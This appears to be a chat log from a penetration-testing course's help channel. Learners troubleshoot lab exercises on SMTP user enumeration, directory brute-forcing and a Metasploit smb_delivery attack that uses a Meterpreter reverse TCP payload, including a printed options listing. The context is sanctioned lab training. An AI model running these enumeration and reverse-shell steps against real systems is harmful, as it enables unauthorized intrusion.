a lot of subdomain bruteforcing tools have recursive options as well. So something to keep in mind for the future
that's apparently a known issue on updated modules. If you already earned back cubes, you can't earn them back twice. No solutions as far as i know, so you'll just have to know by yourself when it is right
Can I ask to support?
Will they help ?
I dont know. Everyone has the issue, so if it could be resolved, it would have been resolved already. check this post: #modules message
I did try that with dnsenum, but that didnt work, because there were no NS records found.. I am still going through the list.. if not I will try a different tool
are you using inlanefreight.com and not inlanefreight.htb? just double check that
.com
in "The Live Engagement" of the shells and payloads module, am i forced to use parrot? can i just use my kali vm instead?
Module : Footprinting
Section : SMTP
URL : https://academy.hackthebox.com/module/112/section/1072
I don't understand what I'm supposed to do in the last question.
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
Considering :
- The content of the course : ||Therefore, one should never entirely rely on the results of automatic tools.||
- The absence of command other than telnet in the cheat-sheet
- The hint : ||We recommend to use the Footprinting-wordlist provided as resource.||
I'm wondering if I am supposed to go through the wordlist manually while typing VRFY commands ?
Any hint would be appreciated.
you can pivot to use your own vm
any one solved this Creepy Crawlies
in information gathering - web edition
you mean setting up a socks proxy?
you can use any pivoting techniques you want
yes i did it not long ago... what can i do to help?
the reconspider.py dont work
did you install scrapy first?
recon spider is very straightforward.. may i see the command you used to run it?
can i dm u
you can just copy the command and paste it here
no one will argue against that...especially if you delete the message afterwards
python3 ReconSpider.py inlanefreight.com
try http://
i want to show u the replay
python3 ReconSpider.py http://inlanefreight.com
still didnt work
if u scroll up js a bit you can see i have the same issue
lemme check
got scrapy installed
this is what it gives me when running the command
you could try with the tool smtp-user-enum if you dont want to go for it manually
try with sudo
not sudo... do not use pip3 install with sudo
and no sudo with python scripts unless it is really needed
change the directory you are in
i am not using sudo
what is your operating system?
PermissionError: [Errno 13] Permission denied: 'results.json'
means you have not the permissions to write in the directory
yeah... run the script from /home/yourusername/Desktop
Thanks but no success with it.
smtp-user-enum -M VRFY -U ~/Desktop/footprinting-wordlist.txt -t 10.129.61.15
kali linux
(Using the provided wordlist*)
did you install it from scratch or a pre-built image?
i will restart and try again now
in my notes i see i had to up the timeout to 15secs, it is 5 by default, dont know if that could help
do not install kali from an iso. use a vm image such as virtualbox or vmware
yeah i on vm
yeah but on the vm... did you use an iso to set up kali? or a pre-built ready to use image?
its recommended to use an image...
yes but installing via iso is also fine
i will try on the HTB instance
youre probly right but if he fiddled stuff and broke his kali.... its best to try a fresh install and just use
pip3 install scrapy
and then try again
or a snapshot to revert
hold on i thought you were troubleshooting something else.. .youre right just use the damn script from your desktop
gives me this
what about this huge error?
when i try to run reconspider it gave me this: No module named 'scrapy.downloadermiddlewares.offsite' is it possible to add this to the py script manually? (i do have scrapy installed)
yeah thats the error i want him to start fresh for
||With 20sec timeout it worked successfully. I don't get how a timeout can fool the brute force script, but anyway tyvm for your help 🙏 ||
should be a godwin point for troubleshooting to full reinstall
what should i do then
even on instance gives me this
i cant help you... im sorry its too time consuming.. perhaps someone else can tackle this for you later
add --break-system-packages at the end it should work
at least it did for me
it will work with break stuff but well...
sometimes it takes sacrifice to make things work ig lmao
if it is the pwnbox indeed, add break packages like said above
if it is your box, you should learn to set up pyenv and manage your python environments
when i was first using kali back in 2020, i broke pip. It was the quickest way to revert because i was using vmware free version that didnt have snapshots. thats why.
as absurd as it sounds... it happened.
unable to update pip either it seems
pip3 =/= pip
i guess because the smtp server is slow to answer to our requests
python3 -m venv temp-env
source temp-env/bin/activate
pip3 install scrapy
run this ^
no way on earth YOU ARE HIM
tried this in pwnbox i didn't receive an error
looks good
generally if you need to use --break-system-packages, you're doing it wrong
so this creates like a temporary python environment or?
exactly
well not temporary, I just named it that way, it's just an env, any changes you make to packages will be contained in there
in active directory how to know the resources(file server or web server for example) that is allowed for specific user
you can check the ACL using powerview, bloodhound etc
acl of every resource or acl of the specific user?
you can do both if you want, depends on what information you want to see
can someone explain why this isnt working im following the module. windows server in the windows privilege escalation module
0.0.0.0 is a valid listen address but can't be used to connect, think about which IP you should use
it should be my tun 0
so my tun0 didnt work
check your msf options
and your LHOST is set to your local ip
no, you check it yourself
how do i find out how to hack
ask XreOuS
Xre0us tell me 🥺

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hi guys, I started with HTB recently and I am stuck on Getting Started module, Web enumeration module.
- my virtual lab provided was missing dirb folder/tool - but I solved by just creating it from github
- after running gobuster dir ... it did not find /wordpress nor it exists when I try to access it via browser.
Is it possible the module / pwnmachine spawned is wrong?
are you doing http://ip:port?
yes
the :port part is critical because the web service is not running on 80
but also /wordpress isn't where the answer is
and got a account
robots.txt is also missing when running gobuster
what is your command you're running
does it tell me how to hack in rules
no it tells you what the rules of the server are
gobuster dir -u http://94.237.59.63:50006/ -w /usr/share/dirb/wordlists/common.txt
restart your target
ive tried a number of combinations but im not sure what im missing. im doing this in my kali machine since its not working on the website
you're missing: RHOST (remote Host); LHOST (your tun0)
I did twice today and twice yesterday.
I restarted it again and ran nmap -sV on it first and I get Not shown: 915 filtered tcp ports (no-response), 85 closed tcp ports (reset)
you don't need to nmap scan the public_IP
you're given a port to work with
whenever htb gives you an IP:PORT to work with; that's your scope to work with
no other ports on that host are in your scope
Makes sense. Thanks.
im using the ip given in the practical and my tun 0
because it's trying to bind to the remote host for SMB...which is already running
i am doing this in my kali because something is up with the module on the web
what is it supposed to look like
reading the options tells you what each option does
The local host or network interface to listen on. This MUST be an address on the local machine
if i set the srvhost as the target and the lhost as my tun0 it does not work
if i set the srvhost to my kali ip it does not work
...
brother
i want you to read the words very carefully
it has to be LOCAL
as in on the machine you're running the exploit from
if you are in the privesc module, section dealing with end of life systems, windows server, the example is quite explicit. under the title Obtaining a Meterpreter Shell
yea im not too sure cause every combination fails
without seeing whats happening its going to be hard to see whats wrong
ok let me try
that's the course
msf6 exploit(windows/smb/smb_delivery) > show options
Module options (exploit/windows/smb/smb_delivery):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_NAME    test.dll         no        DLL file name
   FOLDER_NAME                   no        Folder name to share (Default none)
   SHARE                         no        Share (Default Random)
   SRVHOST      10.10.14.3       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT      445              yes       The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.3       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   1   PSH
i got cookie but after decoding via cyberchef website its still giving wrong any help
it helps if you give us the module name and section name
@fathom pendant module:- USING WEB PROXIES & section skill assessment
im going to run it
what... section
skill-assessment
the value should be 3...a
yah i got it
make sure no extra spaces in your answer
well it looks like it ran the test.dll
now switch the filename to your payload you want to serve
Try replacing 0.0.0.0 to the local ip address of the machine
Oh, you did that?
yeah he's already done that
my screenshot was just of the setting description
i tried almost any combination and it just gives this and does not do the next step
¯\_(ツ)_/¯
does not send stage
Are both on the same network?
yes
(Connected to the same wifi)
i see this in my notes on that section: Try to pay attention to payload x64 or x86, sessions 64 or 32 etc.
whatever that could mean.... : D
you're not really adding anything, he can't be connected to the machine in the first place if he's not on the network
Just to make sure
@fathom pendant thank you it was again spacing
he can't be xfreerdped into the machine if he's not on the network
don't dm people without asking btw
@fathom pendant ok sir
if anyone wants to watch me stream it on screen share so were on the same page that would be cool
no
i'm not that cool
🫤
2 things: 1) you can't screenshare in the discord anyway; 2) that requires dming
its so much easier to see whats happening
did you try to check what i sent you in a previous message about payloads etc
i guess i had the same issue
who said test.dll was a revshell
Thank you so much!
the course is saying we got a revshell back
from test.dll?
or from the payload you crafted?
so far he's only launching it with the test payload
and isn't with the crafted payload
from test, it is in the smb delivery msf module
set the srvhost and lhost again and try it again
or restart target and try it again
your lhost looks like something that wouldn't be on htb
he just reset the msfconsole
so it's default
i am using my kali because something wont let me log in on the web page
so i used the vpn file and 10.10.16.52 is my tun 0
did you turn off the pwnbox while using kali?
worked for me 
change region try again maybe
network path is not found, so the target can't reach your smb server
you still have your LHOST to your local network
he fixed it
did you try to change the payload to x86?
the target is x64 I think
no im not sure how to change it
payload doesn't matter if the target can't reach the host
@wary tendon set lhost tun0
trying to reset everything
set payload windows/meterpreter/reverse_tcp
it should auto-set
yeah perhaps i just guess if i have noted that about the payload it has to be for something. And i also assume the options are now set up correctly. so could be a waste of time
The first error to deal with is right there in the screen shot, the target cannot reach the host
if all the settings look correct, try changing regions. it wouldn't be the first time i've seen changing regions fix weird issues like this. just happened the other night with someone else.
that s an older screenshot, the first he posted i think, but i may be wrong
same here, tls issue and the workaround doesnt work
😦
i put in a ticket but they came back with instructions that i had already done
so i used my kali which worked up until now
Hey guys,
I am doing the linux privilege escalation module and stuck at this question?
Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.
what are the instructions?
I looked at various directories but couldn't figure it out. Any hint or help?
change to tcp change server locations, make sure what im putting in is correct
haha
that's really all there is to it
that should resolve any issues assuming your vm isn't configured weird. instead of simply changing servers, have you changed regions like i suggested?
it worked for me so 
i just thought there was some secret ingredient
The "Information Gathering - Web Edition" module was updated with whole new section but some were just adjusted, in the skill assessment section I see that questions were changed but my old answers were not removed!
yeah, nothing you can do about it
just redo the questions (even though you can't submit the answer)
and just note down what's different
Yup, I am just giving some feedback to htb team so they can enhance the UI/UX, thank you buddy
it's probably been submitted ad nauseam at this point lol
i'm sure they're trying to figure out how to do it without breaking everything
yea i dont know how to go forward i cant even get in anymore
1) you never answered my question i asked like 3 times. 2) we don't know what "cant get in" means. into what? your computer? your vm? the pwnbox? the victim?
into the target
are you a troll
from which locations did you change from and to?
did you redownload the new vpn pack?
if you want to see what im talking about but noone wants to let me share my screen with them
yes i redownloaded a new vpn
if you had simply answered the questions, it would have been resolved 30 mins ago
did you close the old vpn connection?
that's not vpn region my dude
that's pwnbox region
vpn regions don't have "UK/DE"
im using US academy 5
VPN regions are [EU/US]-academy-[1..5]
have you changed from US vpn to an EU vpn?
i have but i will try again
ok im connected through my kali using openvpn and the vpn file
going to start target
spawning
it no connect B(
type ip a and show the results
sounds like you're not on the vpn, or the correct vpn
when you changed regions did you download and use the new vpn file?
also, in your xfreerdp command you need to wrap the password in quotes because of how linux handles the special characters
did you use /tls-seclevel:0
ok im in the target and this is what the base msf console looks like for smb delivery
set lhost tun0
done
10.10.16.78 should work
it doesn't matter, 0.0.0.0 will make it listen on all adapters
you can specify just one adapter (tun0) if you want
try it from the pwnbox
can you even ping to your own machine from the target
i cant from pwnbox i cant connect there is something wrong with me getting in from there
I found it does not work, but if i use remmina instead of xfreerdp and set Security transport Negotiation to RDP protocol security and not tls, it is able to connect to the target
it worked for me for this target 
could be his vm, some dumb firewall setting or something
otherwise the smb_delivery stuff works fine
just do it on the pwnbox to move on
yeah
ill try to log in from there one sec
as I've said it's just to get a msf shell, there are a lot of other ways to do that
maybe run msfconsole with sudo, because it can't open port 445?
pwnbox has issues with rdp
see if you can ping your host from the target. also try running msfconsole with sudo.
maybe yes, i ran it as sudo as well
you need to use sudo
the error tells you that you don't have the permissions required to bind port 445
sorry to ask here, How do i access general do I need to get a role?
read #welcome
sorry
you need root privs to bind any port 1000 and below i think
1024 and below
thanks s1ade
yay! congrats!
it will work in your vm too if you use sudo with msfconsole
after all that hassle, it is the kind of thing you will never forget
it was a wild ride to watch
his original screenshots didn't include the msfconsole command so we had limited knowledge 😛
yeah or we all missed it : D
nothing can stop you now!!!
its not dropping into a shell
use a different payload
nah the first shell is at 4444
id look at the errors. Based on you using the default meterpreter port 4444 on your initial rundll meterpreter to get session 1, that port is now in use by that session. Two things cant use a port at once